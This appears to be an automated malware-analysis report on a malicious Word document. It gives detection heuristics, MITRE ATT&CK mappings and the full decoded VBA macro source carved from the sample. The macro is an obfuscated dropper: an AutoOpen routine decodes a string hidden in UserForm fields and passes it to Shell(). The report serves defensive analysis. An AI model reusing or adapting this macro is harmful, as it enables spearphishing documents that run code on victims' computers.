MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
The file is a malicious Office document containing a VBA macro with an Autoopen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute external code. The presence of VBA macros and the use of Shell() strongly suggest a downloader or dropper functionality, aiming to fetch and execute further malicious components. The ClamAV detection 'Doc.Dropper.Agent-6484725-0' further supports this assessment.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6484725-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6484725-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3088 bytes |
SHA-256: 44ecc3dfa51b4768c97655586afb65f6839ec5a224b883d1a6cd723e34408b88 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Autoopen()
Dim s As String
s = "zako"
zakoDoc
End Sub
Attribute VB_Name = "Module1"
Function AssertVerifer()
Dim jir As Integer
jir = 1 + 5
AssertVerifer = jir - 1
jir = 1 + AssertVerifer
End Function
Function NameFineReplace()
Dim str As String
str = UserForm1.ListBox1.Tag
str = str + UserForm1.TextBox1.Text
NameFineReplace = str + UserForm1.TextBox2.Text
End Function
Sub zakoDoc()
Dim sdata As String
Dim ind As Integer
cometomed = 90
sdata = "" + NameFineReplace()
Dim sder As String
sdata = "" + sdata
Rem Form1 print
sder = FileDocumentVersion(cometomed, sdata)
cometomed = 0
End Sub
Attribute VB_Name = "Module2"
Function FileDocumentVersion(argum1, exVal)
Dim SplitStr As String
Dim valSev() As Byte
Dim pqjbiux() As Byte
Dim k2 As String
Dim j1 As String
valSev = "L4wMFZ"
Dim maxe() As Byte
AE = UserForm1.tillData(valSev)
Dim silas As Integer
Dim xopova As Integer
Dim XrttacaI() As Byte
k2 = valSev
Dim I As Integer
Dim Qapi2 As Integer
Dim palacet As Integer
palacet = 0
I = 374
Dim ngwiL As String
xopova = 92 - argum1
xopova = xopova - 1
Dim hzmould As String
j1 = exVal
SplitStr = ""
maxe = j1
hzmould = "Wgekise"
With UserForm1
Qapi2 = .tillData(maxe)
ngwiL = "Nirqc3"
cometome = palacet
For uD = cometome To Qapi2
charo = palacet
For zaLp1 = palacet To AE
If maxe(uD) = valSev(zaLp1) Then charo = palacet + charo + 1
Next
If cometome = charo Then
SplitStr = SplitStr + .parseStr(maxe(uD) - xopova)
End If
Next
FileDocumentVersion = SplitStr
silas = xopova + I
.TextBox1.Text = SplitStr
silas = -22 + Len(SplitStr) - silas
If silas = 1 Then
.com1_Click
End If
End With
Rem ABC
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E118EA6D-4B10-4108-9541-D94B51E072DA}{1C1AC397-3F51-4C6C-A885-5EC1914C3B0B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub com1_Click()
UserForm1.TextBox2.Text = ""
Dim Im As Integer
Im = 0
Dim s As String
s = UserForm1.TextBox1.Text
If UserForm1.TextBox1.Tag = "" Then
Shell s, Im
End If
End Sub
Private Sub CommandButton2_Click()
UserForm1.TextBox1.Text = ""
End Sub
Function parseStr(judd)
Dim s As Integer
s = judd
parseStr = Chr$(s)
End Function
Function tillData(nij)
temp = 0
tillData = UBound(nij) + temp
End Function
Private Sub com2_Click()
End Sub
Private Sub but1_Click()
End Sub
Private Sub but2_Click()
End Sub
Private Sub ListBox1_Click()
UserForm1.TextBox2.Text = ""
End Sub
Private Sub TextBox1_Change()
End Sub
Private Sub TextBox2_Change()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.